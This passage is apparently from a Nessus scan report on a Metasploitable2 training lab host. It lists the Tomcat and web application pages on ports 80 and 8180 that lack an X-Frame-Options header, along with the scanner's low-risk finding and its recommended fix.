- http://metasploitable2.sicurform:8180/servlets-examples/servlet/RequestParamExample
- http://metasploitable2.sicurform:8180/servlets-examples/servlet/SessionExample
- http://metasploitable2.sicurform:8180/servlets-examples/sessions.html
- http://metasploitable2.sicurform:8180/tomcat-docs/
- http://metasploitable2.sicurform:8180/tomcat-docs/appdev/
- http://metasploitable2.sicurform:8180/tomcat-docs/appdev/deployment.html
- http://metasploitable2.sicurform:8180/tomcat-docs/appdev/index.html
- http://metasploitable2.sicurform:8180/tomcat-docs/appdev/installation.html
- http://metasploitable2.sicurform:8180/tomcat-docs/appdev/introduction.html
- http://metasploitable2.sicurform:8180/tomcat-docs/appdev/printer/
- http://metasploitable2.sicurform:8180/tomcat-docs/appdev/printer/deployment.html
- http://metasploitable2.sicurform:8180/tomcat-docs/appdev/printer/index.html
- http://metasploitable2.sicurform:8180/tomcat-docs/appdev/printer/installation.html
- http://metasploitable2.sicurform:8180/tomcat-docs/appdev/printer/introduction.html
- http://metasploitable2.sicurform:8180/tomcat-docs/appdev/printer/processes.html
- http://metasploitable2.sicurform:8180/tomcat-docs/appdev/printer/source.html
- http://metasploitable2.sicurform:8180/tomcat-docs/appdev/processes.html
- http://metasploitable2.sicurform:8180/tomcat-docs/appdev/sample/
- http://metasploitable2.sicurform:8180/tomcat-docs/appdev/source.html
- http://metasploitable2.sicurform:8180/tomcat-docs/apr.html
- http://metasploitable2.sicurform:8180/tomcat-docs/architecture/
- http://metasploitable2.sicurform:8180/tomcat-docs/architecture/index.html
- http://metasploitable2.sicurform:8180/tomcat-docs/architecture/overview.html
- http://metasploitable2.sicurform:8180/tomcat-docs/architecture/printer/
- http://metasploitable2.sicurform:8180/tomcat-docs/architecture/printer/index.html
- http://metasploitable2.sicurform:8180/tomcat-docs/architecture/printer/overview.html
- http://metasploitable2.sicurform:8180/tomcat-docs/architecture/printer/requestProcess.html
- http://metasploitable2.sicurform:8180/tomcat-docs/architecture/printer/startup.html
- http://metasploitable2.sicurform:8180/tomcat-docs/architecture/requestProcess.html
- http://metasploitable2.sicurform:8180/tomcat-docs/architecture/startup.html
- http://metasploitable2.sicurform:8180/tomcat-docs/balancer-howto.html
- http://metasploitable2.sicurform:8180/tomcat-docs/building.html
- http://metasploitable2.sicurform:8180/tomcat-docs/catalina/docs/api/
- http://metasploitable2.sicurform:8180/tomcat-docs/catalina/docs/api/index.html
- http://metasploitable2.sicurform:8180/tomcat-docs/catalina/funcspecs/
- http://metasploitable2.sicurform:8180/tomcat-docs/catalina/funcspecs/fs-admin-apps.html
- http://metasploitable2.sicurform:8180/tomcat-docs/catalina/funcspecs/fs-admin-objects.html
- http://metasploitable2.sicurform:8180/tomcat-docs/catalina/funcspecs/fs-admin-opers.html
- http://metasploitable2.sicurform:8180/tomcat-docs/catalina/funcspecs/fs-default.html
- http://metasploitable2.sicurform:8180/tomcat-docs/catalina/funcspecs/fs-jdbc-realm.html
- http://metasploitable2.sicurform:8180/tomcat-docs/catalina/funcspecs/fs-jndi-realm.html
- http://metasploitable2.sicurform:8180/tomcat-docs/catalina/funcspecs/fs-memory-realm.html
- http://metasploitable2.sicurform:8180/tomcat-docs/catalina/funcspecs/index.html
- http://metasploitable2.sicurform:8180/tomcat-docs/catalina/funcspecs/mbean-names.html
- http://metasploitable2.sicurform:8180/tomcat-docs/catalina/funcspecs/printer/
- http://metasploitable2.sicurform:8180/tomcat-docs/catalina/funcspecs/printer/fs-admin-apps.html
- http://metasploitable2.sicurform:8180/tomcat-docs/catalina/funcspecs/printer/fs-admin-objects.html
- http://metasploitable2.sicurform:8180/tomcat-docs/catalina/funcspecs/printer/fs-admin-opers.html
- http://metasploitable2.sicurform:8180/tomcat-docs/catalina/funcspecs/printer/fs-default.html
- http://metasploitable2.sicurform:8180/tomcat-docs/catalina/funcspecs/printer/fs-jdbc-realm.html
- http://metasploitable2.sicurform:8180/tomcat-docs/catalina/funcspecs/printer/fs-jndi-realm.html
- http://metasploitable2.sicurform:8180/tomcat-docs/catalina/funcspecs/printer/fs-memory-realm.html
- http://metasploitable2.sicurform:8180/tomcat-docs/catalina/funcspecs/printer/index.html
- http://metasploitable2.sicurform:8180/tomcat-docs/catalina/funcspecs/printer/mbean-names.html
- http://metasploitable2.sicurform:8180/tomcat-docs/cgi-howto.html
- http://metasploitable2.sicurform:8180/tomcat-docs/class-loader-howto.html
- http://metasploitable2.sicurform:8180/tomcat-docs/cluster-howto.html
- http://metasploitable2.sicurform:8180/tomcat-docs/config/
- http://metasploitable2.sicurform:8180/tomcat-docs/config/ajp.html
- http://metasploitable2.sicurform:8180/tomcat-docs/config/context.html
- http://metasploitable2.sicurform:8180/tomcat-docs/config/engine.html
- http://metasploitable2.sicurform:8180/tomcat-docs/config/globalresources.html
- http://metasploitable2.sicurform:8180/tomcat-docs/config/http.html
- http://metasploitable2.sicurform:8180/tomcat-docs/config/index.html
- http://metasploitable2.sicurform:8180/tomcat-docs/config/loader.html
- http://metasploitable2.sicurform:8180/tomcat-docs/config/manager.html
- http://metasploitable2.sicurform:8180/tomcat-docs/config/printer/
- http://metasploitable2.sicurform:8180/tomcat-docs/config/printer/ajp.html
- http://metasploitable2.sicurform:8180/tomcat-docs/config/printer/context.html
- http://metasploitable2.sicurform:8180/tomcat-docs/config/printer/engine.html
- http://metasploitable2.sicurform:8180/tomcat-docs/config/printer/globalresources.html
- http://metasploitable2.sicurform:8180/tomcat-docs/config/printer/http.html
- http://metasploitable2.sicurform:8180/tomcat-docs/config/printer/index.html
- http://metasploitable2.sicurform:8180/tomcat-docs/config/printer/loader.html
- http://metasploitable2.sicurform:8180/tomcat-docs/config/printer/manager.html
- http://metasploitable2.sicurform:8180/tomcat-docs/config/printer/realm.html
- http://metasploitable2.sicurform:8180/tomcat-docs/config/printer/resources.html
- http://metasploitable2.sicurform:8180/tomcat-docs/config/printer/server.html
- http://metasploitable2.sicurform:8180/tomcat-docs/config/printer/service.html
- http://metasploitable2.sicurform:8180/tomcat-docs/config/printer/valve.html
- http://metasploitable2.sicurform:8180/tomcat-docs/config/realm.html
- http://metasploitable2.sicurform:8180/tomcat-docs/config/resources.html
- http://metasploitable2.sicurform:8180/tomcat-docs/config/server.html
- http://metasploitable2.sicurform:8180/tomcat-docs/config/service.html
- http://metasploitable2.sicurform:8180/tomcat-docs/config/valve.html
- http://metasploitable2.sicurform:8180/tomcat-docs/connectors.html
- http://metasploitable2.sicurform:8180/tomcat-docs/default-servlet.html
- http://metasploitable2.sicurform:8180/tomcat-docs/deployer-howto.html
- http://metasploitable2.sicurform:8180/tomcat-docs/developers.html
- http://metasploitable2.sicurform:8180/tomcat-docs/index.html
- http://metasploitable2.sicurform:8180/tomcat-docs/introduction.html
- http://metasploitable2.sicurform:8180/tomcat-docs/jasper-howto.html
- http://metasploitable2.sicurform:8180/tomcat-docs/jasper/docs/api/
- http://metasploitable2.sicurform:8180/tomcat-docs/jasper/docs/api/index.html
- http://metasploitable2.sicurform:8180/tomcat-docs/jndi-datasource-examples-howto.html
- http://metasploitable2.sicurform:8180/tomcat-docs/jndi-resources-howto.html
- http://metasploitable2.sicurform:8180/tomcat-docs/jspapi/
- http://metasploitable2.sicurform:8180/tomcat-docs/jspapi/about.html
- http://metasploitable2.sicurform:8180/tomcat-docs/jspapi/all-classes.html
- http://metasploitable2.sicurform:8180/tomcat-docs/jspapi/all-packages.html
- http://metasploitable2.sicurform:8180/tomcat-docs/jspapi/deprecated.html
- http://metasploitable2.sicurform:8180/tomcat-docs/jspapi/index.html
- http://metasploitable2.sicurform:8180/tomcat-docs/jspapi/javax/servlet/jsp/HttpJspPage-uses.html
- http://metasploitable2.sicurform:8180/tomcat-docs/jspapi/javax/servlet/jsp/HttpJspPage.html
- http://metasploitable2.sicurform:8180/tomcat-docs/jspapi/javax/servlet/jsp/JspContext-uses.html
- http://metasploitable2.sicurform:8180/tomcat-docs/jspapi/javax/servlet/jsp/JspContext.html
- http://metasploitable2.sicurform:8180/tomcat-docs/jspapi/javax/servlet/jsp/JspEngineInfo-uses.html
- http://metasploitable2.sicurform:8180/tomcat-docs/jspapi/javax/servlet/jsp/JspEngineInfo.html
- http://metasploitable2.sicurform:8180/tomcat-docs/jspapi/javax/servlet/jsp/JspException-uses.html
- http://metasploitable2.sicurform:8180/tomcat-docs/jspapi/javax/servlet/jsp/JspException.html
- http://metasploitable2.sicurform:8180/tomcat-docs/jspapi/javax/servlet/jsp/JspPage-uses.html
- http://metasploitable2.sicurform:8180/tomcat-docs/jspapi/javax/servlet/jsp/JspPage.html
- http://metasploitable2.sicurform:8180/tomcat-docs/jspapi/javax/servlet/jsp/JspWriter-uses.html
- http://metasploitable2.sicurform:8180/tomcat-docs/jspapi/javax/servlet/jsp/JspWriter.html
- http://metasploitable2.sicurform:8180/tomcat-docs/jspapi/javax/servlet/jsp/SkipPageException-uses.html
- http://metasploitable2.sicurform:8180/tomcat-docs/jspapi/javax/servlet/jsp/SkipPageException.html
- http://metasploitable2.sicurform:8180/tomcat-docs/jspapi/javax/servlet/jsp/classes.html
- http://metasploitable2.sicurform:8180/tomcat-docs/jspapi/javax/servlet/jsp/tree.html
- http://metasploitable2.sicurform:8180/tomcat-docs/jspapi/overview-summary.html
- http://metasploitable2.sicurform:8180/tomcat-docs/jspapi/tree.html
- http://metasploitable2.sicurform:8180/tomcat-docs/logging.html
- http://metasploitable2.sicurform:8180/tomcat-docs/manager-howto.html
- http://metasploitable2.sicurform:8180/tomcat-docs/mbeans-descriptor-howto.html
- http://metasploitable2.sicurform:8180/tomcat-docs/monitoring.html
- http://metasploitable2.sicurform:8180/tomcat-docs/printer/
- http://metasploitable2.sicurform:8180/tomcat-docs/printer/apr.html
- http://metasploitable2.sicurform:8180/tomcat-docs/printer/balancer-howto.html
- http://metasploitable2.sicurform:8180/tomcat-docs/printer/building.html
- http://metasploitable2.sicurform:8180/tomcat-docs/printer/cgi-howto.html
- http://metasploitable2.sicurform:8180/tomcat-docs/printer/class-loader-howto.html
- http://metasploitable2.sicurform:8180/tomcat-docs/printer/cluster-howto.html
- http://metasploitable2.sicurform:8180/tomcat-docs/printer/connectors.html
- http://metasploitable2.sicurform:8180/tomcat-docs/printer/default-servlet.html
- http://metasploitable2.sicurform:8180/tomcat-docs/printer/deployer-howto.html
- http://metasploitable2.sicurform:8180/tomcat-docs/printer/developers.html
- http://metasploitable2.sicurform:8180/tomcat-docs/printer/index.html
- http://metasploitable2.sicurform:8180/tomcat-docs/printer/introduction.html
- http://metasploitable2.sicurform:8180/tomcat-docs/printer/jasper-howto.html
- http://metasploitable2.sicurform:8180/tomcat-docs/printer/jndi-datasource-examples-howto.html
- http://metasploitable2.sicurform:8180/tomcat-docs/printer/jndi-resources-howto.html
- http://metasploitable2.sicurform:8180/tomcat-docs/printer/logging.html
- http://metasploitable2.sicurform:8180/tomcat-docs/printer/manager-howto.html
- http://metasploitable2.sicurform:8180/tomcat-docs/printer/mbeans-descriptor-howto.html
- http://metasploitable2.sicurform:8180/tomcat-docs/printer/monitoring.html
- http://metasploitable2.sicurform:8180/tomcat-docs/printer/proxy-howto.html
- http://metasploitable2.sicurform:8180/tomcat-docs/printer/realm-howto.html
- http://metasploitable2.sicurform:8180/tomcat-docs/printer/security-manager-howto.html
- http://metasploitable2.sicurform:8180/tomcat-docs/printer/setup.html
- http://metasploitable2.sicurform:8180/tomcat-docs/printer/ssi-howto.html
- http://metasploitable2.sicurform:8180/tomcat-docs/printer/ssl-howto.html
- http://metasploitable2.sicurform:8180/tomcat-docs/printer/status.html
- http://metasploitable2.sicurform:8180/tomcat-docs/printer/virtual-hosting-howto.html
- http://metasploitable2.sicurform:8180/tomcat-docs/printer/windows-service-howto.html
- http://metasploitable2.sicurform:8180/tomcat-docs/proxy-howto.html
- http://metasploitable2.sicurform:8180/tomcat-docs/realm-howto.html
- http://metasploitable2.sicurform:8180/tomcat-docs/security-manager-howto.html
- http://metasploitable2.sicurform:8180/tomcat-docs/servletapi/
- http://metasploitable2.sicurform:8180/tomcat-docs/servletapi/about.html
- http://metasploitable2.sicurform:8180/tomcat-docs/servletapi/all-classes.html
- http://metasploitable2.sicurform:8180/tomcat-docs/servletapi/all-packages.html
- http://metasploitable2.sicurform:8180/tomcat-docs/servletapi/alphaindex.html
- http://metasploitable2.sicurform:8180/tomcat-docs/servletapi/deprecated.html
- http://metasploitable2.sicurform:8180/tomcat-docs/servletapi/index.html
- http://metasploitable2.sicurform:8180/tomcat-docs/servletapi/javax/servlet/Filter-uses.html
- http://metasploitable2.sicurform:8180/tomcat-docs/servletapi/javax/servlet/Filter.html
- http://metasploitable2.sicurform:8180/tomcat-docs/servletapi/javax/servlet/FilterChain-uses.html
- http://metasploitable2.sicurform:8180/tomcat-docs/servletapi/javax/servlet/FilterChain.html
- http://metasploitable2.sicurform:8180/tomcat-docs/servletapi/javax/servlet/FilterConfig-uses.html
- http://metasploitable2.sicurform:8180/tomcat-docs/servletapi/javax/servlet/FilterConfig.html
- http://metasploitable2.sicurform:8180/tomcat-docs/servletapi/javax/servlet/GenericServlet-uses.html
- http://metasploitable2.sicurform:8180/tomcat-docs/servletapi/javax/servlet/GenericServlet.html
- http://metasploitable2.sicurform:8180/tomcat-docs/servletapi/javax/servlet/RequestDispatcher-uses.html
- http://metasploitable2.sicurform:8180/tomcat-docs/servletapi/javax/servlet/RequestDispatcher.html
- http://metasploitable2.sicurform:8180/tomcat-docs/servletapi/javax/servlet/Servlet-uses.html
- http://metasploitable2.sicurform:8180/tomcat-docs/servletapi/javax/servlet/Servlet.html
- http://metasploitable2.sicurform:8180/tomcat-docs/servletapi/javax/servlet/ServletConfig-uses.html
- http://metasploitable2.sicurform:8180/tomcat-docs/servletapi/javax/servlet/ServletConfig.html
- http://metasploitable2.sicurform:8180/tomcat-docs/servletapi/javax/servlet/ServletContext-uses.html
- http://metasploitable2.sicurform:8180/tomcat-docs/servletapi/javax/servlet/ServletContext.html
- http://metasploitable2.sicurform:8180/tomcat-docs/servletapi/javax/servlet/ServletContextAttributeEvent-uses.html
- http://metasploitable2.sicurform:8180/tomcat-docs/servletapi/javax/servlet/ServletContextAttributeEvent.html
- http://metasploitable2.sicurform:8180/tomcat-docs/servletapi/javax/servlet/ServletContextAttributeListener-uses.html
- http://metasploitable2.sicurform:8180/tomcat-docs/servletapi/javax/servlet/ServletContextAttributeListener.html
- http://metasploitable2.sicurform:8180/tomcat-docs/servletapi/javax/servlet/ServletContextEvent-uses.html
- http://metasploitable2.sicurform:8180/tomcat-docs/servletapi/javax/servlet/ServletContextEvent.html
- http://metasploitable2.sicurform:8180/tomcat-docs/servletapi/javax/servlet/ServletContextListener-uses.html
- http://metasploitable2.sicurform:8180/tomcat-docs/servletapi/javax/servlet/ServletContextListener.html
- http://metasploitable2.sicurform:8180/tomcat-docs/servletapi/javax/servlet/ServletException-uses.html
- http://metasploitable2.sicurform:8180/tomcat-docs/servletapi/javax/servlet/ServletException.html
- http://metasploitable2.sicurform:8180/tomcat-docs/servletapi/javax/servlet/ServletInputStream-uses.html
- http://metasploitable2.sicurform:8180/tomcat-docs/servletapi/javax/servlet/ServletInputStream.html
- http://metasploitable2.sicurform:8180/tomcat-docs/servletapi/javax/servlet/ServletOutputStream-uses.html
- http://metasploitable2.sicurform:8180/tomcat-docs/servletapi/javax/servlet/ServletOutputStream.html
- http://metasploitable2.sicurform:8180/tomcat-docs/servletapi/javax/servlet/ServletRequest-uses.html
- http://metasploitable2.sicurform:8180/tomcat-docs/servletapi/javax/servlet/ServletRequest.html
- http://metasploitable2.sicurform:8180/tomcat-docs/servletapi/javax/servlet/ServletRequestAttributeEvent-uses.html
- http://metasploitable2.sicurform:8180/tomcat-docs/servletapi/javax/servlet/ServletRequestAttributeEvent.html
- http://metasploitable2.sicurform:8180/tomcat-docs/servletapi/javax/servlet/ServletRequestAttributeListener-uses.html
- http://metasploitable2.sicurform:8180/tomcat-docs/servletapi/javax/servlet/ServletRequestAttributeListener.html
- http://metasploitable2.sicurform:8180/tomcat-docs/servletapi/javax/servlet/ServletRequestEvent-uses.html
- http://metasploitable2.sicurform:8180/tomcat-docs/servletapi/javax/servlet/ServletRequestEvent.html
- http://metasploitable2.sicurform:8180/tomcat-docs/servletapi/javax/servlet/ServletRequestListener-uses.html
- http://metasploitable2.sicurform:8180/tomcat-docs/servletapi/javax/servlet/ServletRequestListener.html
- http://metasploitable2.sicurform:8180/tomcat-docs/servletapi/javax/servlet/ServletRequestWrapper-uses.html
- http://metasploitable2.sicurform:8180/tomcat-docs/servletapi/javax/servlet/ServletRequestWrapper.html
- http://metasploitable2.sicurform:8180/tomcat-docs/servletapi/javax/servlet/ServletResponse-uses.html
- http://metasploitable2.sicurform:8180/tomcat-docs/servletapi/javax/servlet/ServletResponse.html
- http://metasploitable2.sicurform:8180/tomcat-docs/servletapi/javax/servlet/ServletResponseWrapper-uses.html
- http://metasploitable2.sicurform:8180/tomcat-docs/servletapi/javax/servlet/ServletResponseWrapper.html
- http://metasploitable2.sicurform:8180/tomcat-docs/servletapi/javax/servlet/SingleThreadModel-uses.html
- http://metasploitable2.sicurform:8180/tomcat-docs/servletapi/javax/servlet/SingleThreadModel.html
- http://metasploitable2.sicurform:8180/tomcat-docs/servletapi/javax/servlet/UnavailableException-uses.html
- http://metasploitable2.sicurform:8180/tomcat-docs/servletapi/javax/servlet/UnavailableException.html
- http://metasploitable2.sicurform:8180/tomcat-docs/servletapi/javax/servlet/classes.html
- http://metasploitable2.sicurform:8180/tomcat-docs/servletapi/javax/servlet/http/Cookie-uses.html
- http://metasploitable2.sicurform:8180/tomcat-docs/servletapi/javax/servlet/http/Cookie.html
- http://metasploitable2.sicurform:8180/tomcat-docs/servletapi/javax/servlet/http/HttpServletRequest-uses.html
- http://metasploitable2.sicurform:8180/tomcat-docs/servletapi/javax/servlet/http/HttpServletRequest.html
- http://metasploitable2.sicurform:8180/tomcat-docs/servletapi/javax/servlet/http/HttpServletRequestWrapper-uses.html
- http://metasploitable2.sicurform:8180/tomcat-docs/servletapi/javax/servlet/http/HttpServletRequestWrapper.html
- http://metasploitable2.sicurform:8180/tomcat-docs/servletapi/javax/servlet/http/HttpServletResponseWrapper-uses.html
- http://metasploitable2.sicurform:8180/tomcat-docs/servletapi/javax/servlet/http/HttpServletResponseWrapper.html
- http://metasploitable2.sicurform:8180/tomcat-docs/servletapi/javax/servlet/http/HttpSession-uses.html
- http://metasploitable2.sicurform:8180/tomcat-docs/servletapi/javax/servlet/http/HttpSession.html
- http://metasploitable2.sicurform:8180/tomcat-docs/servletapi/javax/servlet/http/HttpSessionActivationListener-uses.html
- http://metasploitable2.sicurform:8180/tomcat-docs/servletapi/javax/servlet/http/HttpSessionActivationListener.html
- http://metasploitable2.sicurform:8180/tomcat-docs/servletapi/javax/servlet/http/HttpSessionAttributeListener-uses.html
- http://metasploitable2.sicurform:8180/tomcat-docs/servletapi/javax/servlet/http/HttpSessionAttributeListener.html
- http://metasploitable2.sicurform:8180/tomcat-docs/servletapi/javax/servlet/http/HttpSessionBindingEvent-uses.html
- http://metasploitable2.sicurform:8180/tomcat-docs/servletapi/javax/servlet/http/HttpSessionBindingEvent.html
- http://metasploitable2.sicurform:8180/tomcat-docs/servletapi/javax/servlet/http/HttpSessionBindingListener-uses.html
- http://metasploitable2.sicurform:8180/tomcat-docs/servletapi/javax/servlet/http/HttpSessionBindingListener.html
- http://metasploitable2.sicurform:8180/tomcat-docs/servletapi/javax/servlet/http/HttpSessionContext-uses.html
- http://metasploitable2.sicurform:8180/tomcat-docs/servletapi/javax/servlet/http/HttpSessionContext.html
- http://metasploitable2.sicurform:8180/tomcat-docs/servletapi/javax/servlet/http/HttpSessionEvent-uses.html
- http://metasploitable2.sicurform:8180/tomcat-docs/servletapi/javax/servlet/http/HttpSessionEvent.html
- http://metasploitable2.sicurform:8180/tomcat-docs/servletapi/javax/servlet/http/HttpSessionListener-uses.html
- http://metasploitable2.sicurform:8180/tomcat-docs/servletapi/javax/servlet/http/HttpSessionListener.html
- http://metasploitable2.sicurform:8180/tomcat-docs/servletapi/javax/servlet/http/HttpUtils-uses.html
- http://metasploitable2.sicurform:8180/tomcat-docs/servletapi/javax/servlet/http/HttpUtils.html
- http://metasploitable2.sicurform:8180/tomcat-docs/servletapi/javax/servlet/http/classes.html
- http://metasploitable2.sicurform:8180/tomcat-docs/servletapi/javax/servlet/http/package-summary.html
- http://metasploitable2.sicurform:8180/tomcat-docs/servletapi/javax/servlet/http/tree.html
- http://metasploitable2.sicurform:8180/tomcat-docs/servletapi/javax/servlet/package-summary.html
- http://metasploitable2.sicurform:8180/tomcat-docs/servletapi/javax/servlet/tree.html
- http://metasploitable2.sicurform:8180/tomcat-docs/servletapi/overview-summary.html
- http://metasploitable2.sicurform:8180/tomcat-docs/servletapi/serialized-form.html
- http://metasploitable2.sicurform:8180/tomcat-docs/servletapi/tree.html
- http://metasploitable2.sicurform:8180/tomcat-docs/setup.html
- http://metasploitable2.sicurform:8180/tomcat-docs/ssi-howto.html
- http://metasploitable2.sicurform:8180/tomcat-docs/ssl-howto.html
- http://metasploitable2.sicurform:8180/tomcat-docs/status.html
- http://metasploitable2.sicurform:8180/tomcat-docs/virtual-hosting-howto.html
- http://metasploitable2.sicurform:8180/tomcat-docs/windows-service-howto.html
- http://metasploitable2.sicurform:8180/webdav
- http://metasploitable2.sicurform:8180/webdav/
- http://metasploitable2.sicurform:8180/webdav/index.html

50345 - Missing or Permissive X-Frame-Options HTTP Response Header
-
Synopsis
The remote web server does not take steps to mitigate a class of web application vulnerabilities.
Description
The remote web server in some responses sets a permissive X-Frame-Options response header or does not set one at all.

The X-Frame-Options header has been proposed by Microsoft as a way to mitigate clickjacking attacks and is currently supported by all major browser vendors
See Also
Solution
Set a properly configured X-Frame-Options header for all requested resources.
Risk Factor
None
Plugin Information
Published: 2010/10/26, Modified: 2021/01/19
Plugin Output

tcp/80/www


The following pages do not set a X-Frame-Options response header or set a permissive policy:

- http://metasploitable2.sicurform/
- http://metasploitable2.sicurform/dav/
- http://metasploitable2.sicurform/dvwa/dvwa/
- http://metasploitable2.sicurform/dvwa/dvwa/css/
- http://metasploitable2.sicurform/dvwa/dvwa/images/
- http://metasploitable2.sicurform/dvwa/dvwa/includes/
- http://metasploitable2.sicurform/dvwa/dvwa/includes/DBMS/
- http://metasploitable2.sicurform/dvwa/dvwa/includes/DBMS/DBMS.php
- http://metasploitable2.sicurform/dvwa/dvwa/includes/DBMS/MySQL.php
- http://metasploitable2.sicurform/dvwa/dvwa/includes/dvwaPage.inc.php
- http://metasploitable2.sicurform/dvwa/dvwa/includes/dvwaPhpIds.inc.php
- http://metasploitable2.sicurform/dvwa/dvwa/js/
- http://metasploitable2.sicurform/dvwa/login.php
- http://metasploitable2.sicurform/mutillidae/
- http://metasploitable2.sicurform/mutillidae/documentation/
- http://metasploitable2.sicurform/mutillidae/documentation/how-to-access-Mutillidae-over-Virtual-Box-network.php
- http://metasploitable2.sicurform/mutillidae/documentation/vulnerabilities.php
- http://metasploitable2.sicurform/mutillidae/framer.html
- http://metasploitable2.sicurform/mutillidae/index.php
- http://metasploitable2.sicurform/mutillidae/set-up-database.php
- http://metasploitable2.sicurform/mutillidae/styles/
- http://metasploitable2.sicurform/mutillidae/styles/ddsmoothmenu/
- http://metasploitable2.sicurform/phpMyAdmin/
- http://metasploitable2.sicurform/phpMyAdmin/index.php
- http://metasploitable2.sicurform/test/
- http://metasploitable2.sicurform/test/testoutput/
- http://metasploitable2.sicurform/twiki/
- http://metasploitable2.sicurform/twiki/TWikiHistory.html
- http://metasploitable2.sicurform/twiki/bin/oops
- http://metasploitable2.sicurform/twiki/bin/oops/Main
- http://metasploitable2.sicurform/twiki/bin/oops/Main/WebHomemailto%3Awebmasteryour
- http://metasploitable2.sicurform/twiki/bin/oops/Main/WebHomemailto%3Awebmasteryour/company
- http://metasploitable2.sicurform/twiki/bin/search
- http://metasploitable2.sicurform/twiki/bin/search/Main
- http://metasploitable2.sicurform/twiki/bin/search/Main/SearchResult
- http://metasploitable2.sicurform/twiki/bin/view
- http://metasploitable2.sicurform/twiki/bin/view/Main
- http://metasploitable2.sicurform/twiki/bin/view/Main/WebHome

50345 - Missing or Permissive X-Frame-Options HTTP Response Header
-
Synopsis
The remote web server does not take steps to mitigate a class of web application vulnerabilities.
Description
The remote web server in some responses sets a permissive X-Frame-Options response header or does not set one at all.

The X-Frame-Options header has been proposed by Microsoft as a way to mitigate clickjacking attacks and is currently supported by all major browser vendors
See Also
Solution
Set a properly configured X-Frame-Options header for all requested resources.
Risk Factor
None
Plugin Information
Published: 2010/10/26, Modified: 2021/01/19
Plugin Output

tcp/8180/www


The following pages do not set a X-Frame-Options response header or set a permissive policy:

- http://metasploitable2.sicurform:8180/
- http://metasploitable2.sicurform:8180/admin/
- http://metasploitable2.sicurform:8180/admin/error.jsp
- http://metasploitable2.sicurform:8180/admin/j_security_check
- http://metasploitable2.sicurform:8180/jsp-examples/
- http://metasploitable2.sicurform:8180/jsp-examples/cal/Entries.java.html
- http://metasploitable2.sicurform:8180/jsp-examples/cal/Entry.java.html
- http://metasploitable2.sicurform:8180/jsp-examples/cal/TableBean.java.html
- http://metasploitable2.sicurform:8180/jsp-examples/cal/cal1.jsp
- http://metasploitable2.sicurform:8180/jsp-examples/cal/cal1.jsp.html
- http://metasploitable2.sicurform:8180/jsp-examples/cal/cal2.jsp.html
- http://metasploitable2.sicurform:8180/jsp-examples/cal/calendar.html
- http://metasploitable2.sicurform:8180/jsp-examples/cal/login.html
- http://metasploitable2.sicurform:8180/jsp-examples/checkbox/CheckTest.html
- http://metasploitable2.sicurform:8180/jsp-examples/checkbox/check.html
- http://metasploitable2.sicurform:8180/jsp-examples/checkbox/checkresult.jsp
- http://metasploitable2.sicurform:8180/jsp-examples/checkbox/checkresult.jsp.html
- http://metasploitable2.sicurform:8180/jsp-examples/checkbox/cresult.html
- http://metasploitable2.sicurform:8180/jsp-examples/colors/ColorGameBean.html
- http://metasploitable2.sicurform:8180/jsp-examples/colors/clr.html
- http://metasploitable2.sicurform:8180/jsp-examples/colors/colors.html
- http://metasploitable2.sicurform:8180/jsp-examples/colors/colrs.jsp
- http://metasploitable2.sicurform:8180/jsp-examples/colors/colrs.jsp.html
- http://metasploitable2.sicurform:8180/jsp-examples/dates/date.html
- http://metasploitable2.sicurform:8180/jsp-examples/dates/date.jsp
- http://metasploitable2.sicurform:8180/jsp-examples/dates/date.jsp.html
- http://metasploitable2.sicurform:8180/jsp-examples/error/er.html
- http://metasploitable2.sicurform:8180/jsp-examples/error/err.jsp
- http://metasploitable2.sicurform:8180/jsp-examples/error/err.jsp.html
- http://metasploitable2.sicurform:8180/jsp-examples/error/error.html
- http://metasploitable2.sicurform:8180/jsp-examples/forward/forward.jsp
- http://metasploitable2.sicurform:8180/jsp-examples/forward/forward.jsp.html
- http://metasploitable2.sicurform:8180/jsp-examples/forward/fwd.html
- http://metasploitable2.sicurform:8180/jsp-examples/include/inc.html
- http://metasploitable2.sicurform:8180/jsp-examples/include/include.jsp
- http://metasploitable2.sicurform:8180/jsp-examples/include/include.jsp.html
- http://metasploitable2.sicurform:8180/jsp-examples/index.html
- http://metasploitable2.sicurform:8180/jsp-examples/jsp2/el/Functions.java.html
- http://metasploitable2.sicurform:8180/jsp-examples/jsp2/el/basic-arithmetic.html
- http://metasploitable2.sicurform:8180/jsp-examples/jsp2/el/basic-arithmetic.jsp
- http://metasploitable2.sicurform:8180/jsp-examples/jsp2/el/basic-arithmetic.jsp.html
- http://metasploitable2.sicurform:8180/jsp-examples/jsp2/el/basic-comparisons.html
- http://metasploitable2.sicurform:8180/jsp-examples/jsp2/el/basic-comparisons.jsp
- http://metasploitable2.sicurform:8180/jsp-examples/jsp2/el/basic-comparisons.jsp.html
- http://metasploitable2.sicurform:8180/jsp-examples/jsp2/el/functions.html
- http://metasploitable2.sicurform:8180/jsp-examples/jsp2/el/functions.jsp
- http://metasploitable2.sicurform:8180/jsp-examples/jsp2/el/functions.jsp.html
- http://metasploitable2.sicurform:8180/jsp-examples/jsp2/el/implicit-objects.html
- http://metasploitable2.sicurform:8180/jsp-examples/jsp2/el/implicit-objects.jsp
- http://metasploitable2.sicurform:8180/jsp-examples/jsp2/el/implicit-objects.jsp.html
- http://metasploitable2.sicurform:8180/jsp-examples/jsp2/jspattribute/FooBean.java.html
- http://metasploitable2.sicurform:8180/jsp-examples/jsp2/jspattribute/HelloWorldSimpleTag.java.html
- http://metasploitable2.sicurform:8180/jsp-examples/jsp2/jspattribute/ShuffleSimpleTag.java.html
- http://metasploitable2.sicurform:8180/jsp-examples/jsp2/jspattribute/TileSimpleTag.java.html
- http://metasploitable2.sicurform:8180/jsp-examples/jsp2/jspattribute/jspattribute.html
- http://metasploitable2.sicurform:8180/jsp-examples/jsp2/jspattribute/jspattribute.jsp
- http://metasploitable2.sicurform:8180/jsp-examples/jsp2/jspattribute/jspattribute.jsp.html
- http://metasploitable2.sicurform:8180/jsp-examples/jsp2/jspattribute/shuffle.html
- http://metasploitable2.sicurform:8180/jsp-examples/jsp2/jspattribute/shuffle.jsp
- http://metasploitable2.sicurform:8180/jsp-examples/jsp2/jspattribute/shuffle.jsp.html
- http://metasploitable2.sicurform:8180/jsp-examples/jsp2/jspx/basic.html
- http://metasploitable2.sicurform:8180/jsp-examples/jsp2/jspx/basic.jspx
- http://metasploitable2.sicurform:8180/jsp-examples/jsp2/jspx/basic.jspx.html
- http://metasploitable2.sicurform:8180/jsp-examples/jsp2/jspx/svgexample.html
- http://metasploitable2.sicurform:8180/jsp-examples/jsp2/jspx/textRotate.html
- http://metasploitable2.sicurform:8180/jsp-examples/jsp2/jspx/textRotate.jspx.html
